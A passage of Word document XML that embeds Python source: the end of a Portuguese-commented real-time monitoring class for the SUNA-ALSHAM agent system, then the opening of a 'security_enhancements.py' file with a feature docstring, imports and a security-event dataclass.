    <w:p w14:paraId="17DEED1E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "total_cycles": sum(self.evolution_cycles.values()),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3B678C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "cycles_by_agent": self.evolution_cycles.copy(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280042EC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "system_status": "operational"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D142224" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E80B6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424CCAD1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Enviar para todos os clientes conectados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170D81C7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        for client in self.websocket_clients.copy():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C387E90" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C6143" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                # Em uma implementação real, usaria WebSocket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590C000F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6B2C8C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7698BC51" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                self.websocket_clients.discard(client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7D57E0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA10E4E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def get_real_time_dashboard_data(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AEAFAF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Retorna dados em tempo real para o dashboard"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7896B53F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        total_cycles = sum(self.evolution_cycles.values())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B428A6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42883E66" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Obter métricas recentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE9D93" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        recent_metrics = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34801E64" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        for agent_id in self.active_agents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321AC443" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            metrics = self.db.get_agent_metrics(agent_id, 1)  # Última hora</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E80153" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            if metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A87B5D4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                performance_metrics = [m for m in metrics if m['metric_name'] == 'performance_score']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33575657" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                response_metrics = [m for m in metrics if m['metric_name'] == 'response_time_ms']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389816A8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA9F6B6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                recent_metrics[agent_id] = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6A6920" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "current_performance": performance_metrics[-1]['value'] if performance_metrics else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594FD5A1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "current_response_time": response_metrics[-1]['value'] if response_metrics else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C355A1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "total_cycles": self.evolution_cycles.get(agent_id, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB90104" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A68D623" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EBD4E8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C539A1B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "timestamp": datetime.now().isoformat(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4BBEC5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "system_status": "operational",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE277EA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "total_agents": len(self.active_agents),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1F1882" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "total_cycles": total_cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC1E86" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "cycles_by_agent": self.evolution_cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2BD8B7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "agent_metrics": recent_metrics,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6025BCBF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "performance_summary": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C6C42E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "avg_performance": statistics.mean([m["current_performance"] for m in recent_metrics.values()]) if recent_metrics else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E60D58E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                "avg_response_time": statistics.mean([m["current_response_time"] for m in recent_metrics.values()]) if recent_metrics else 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ED6EF2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C602E4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5569E1E2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0B7B02" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def generate_comprehensive_report(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057AE8C0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Gera relatório abrangente do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573FCC3D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        return self.analytics.generate_performance_report()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B2CBB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073FE358" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def export_metrics_csv(self, agent_id: str = None) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39015F8A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Exporta métricas para CSV"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BB104C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        return self.analytics.export_data_csv(agent_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176CDAF3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="46185D9D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="2FCC38DC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AE2E2E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    # Teste do sistema de monitoramento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2E87E1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    monitoring = RealTimeMonitoringSystem()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1FB587" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2483E060" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72437EAA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        monitoring.start_monitoring()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F3E04" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADAD57A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📊</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sistema de monitoramento iniciado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783C81BC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Coletando métricas em tempo real...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4449F006" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6389F137" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Executar por 60 segundos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF7BF6B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        for i in range(60):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6477500C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5046D6F1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B0BBAF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            if i % 10 == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1D0423" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                data = monitoring.get_real_time_dashboard_data()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57348B34" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                print(f"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⏱️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {i}s - Agentes ativos: {data['total_agents']}, Ciclos totais: {data['total_cycles']}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CD3797" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA4C55" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Gerar relatório final</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAF46B9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        report = monitoring.generate_comprehensive_report()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28390C23" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        print("\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📋</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RELATÓRIO FINAL:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9367E4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        print(json.dumps(report, indent=2, default=str))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4505731D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1DFED7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    except KeyboardInterrupt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C6801C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        print("\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🛑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Interrompido pelo usuário")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142D6B58" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228EC12A" w14:textId="2B3B01B4" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        monitoring.stop_monitoring()</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E949FC7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="270C9821" w14:textId="1588E866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security_enhancements.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0824B4DD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033B2535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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SUNA-ALSHAM Security Enhancements &amp; Performance Optimizations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0F08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Sistema de segurança robusta e otimizações de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB65025" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="432D7A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FUNCIONALIDADES DE SEGURANÇA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C533A5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Rate limiting inteligente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225B28A5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Validação de entrada robusta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E330468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Logs de auditoria completos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263CC1AE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Detecção de anomalias</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DEF706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Proteção contra ataques DDoS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB7473F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Criptografia de dados sensíveis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6134F9DA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Autenticação multi-fator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862025A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73010E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OTIMIZAÇÕES DE PERFORMANCE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A996CCF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Cache inteligente multi-camadas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEFEC49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Connection pooling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21487102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Compressão de dados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73240DF3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Load balancing adaptativo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49381445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Otimização de queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076E719D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Garbage collection otimizado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33093F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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DB6BD8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C4FB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asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE613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hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48950F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hmac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1992CB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json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA80D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logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D22DB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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D48DC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threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3C6C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datetime import datetime, timedelta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2037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typing import Dict, Any, List, Optional, Set, Callable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEDC4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dataclasses import dataclass, asdict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA75B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collections import defaultdict, deque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65770D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ipaddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2344DE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re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A8D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secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9017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jwt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F54F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cryptography.fernet import Fernet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF8C9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cryptography.hazmat.primitives import hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394CB8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cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4CC9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base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD556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os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466A90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redis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0143AD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sqlite3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C65B0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psutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042179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gzip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13415D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pickle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA9BA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functools import wraps, lru_cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036D8C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weakref</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC1ABE4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEC06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logger = logging.getLogger(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CB9AB7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EFB2357" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438797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@dataclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D27D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SecurityEvent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D33AC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"""Evento de segurança para auditoria"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426AB8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event_id: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132E23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event_type: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C08DC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severity: str  # low, medium, high, critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0E61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source_ip: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C158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user_agent: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517B96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endpoint: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D568D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payload_hash: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C810C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timestamp: datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD1FF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details: Dict[str, Any]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3F14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blocked: bool = False</w:t>
      </w:r>
    </w:p>
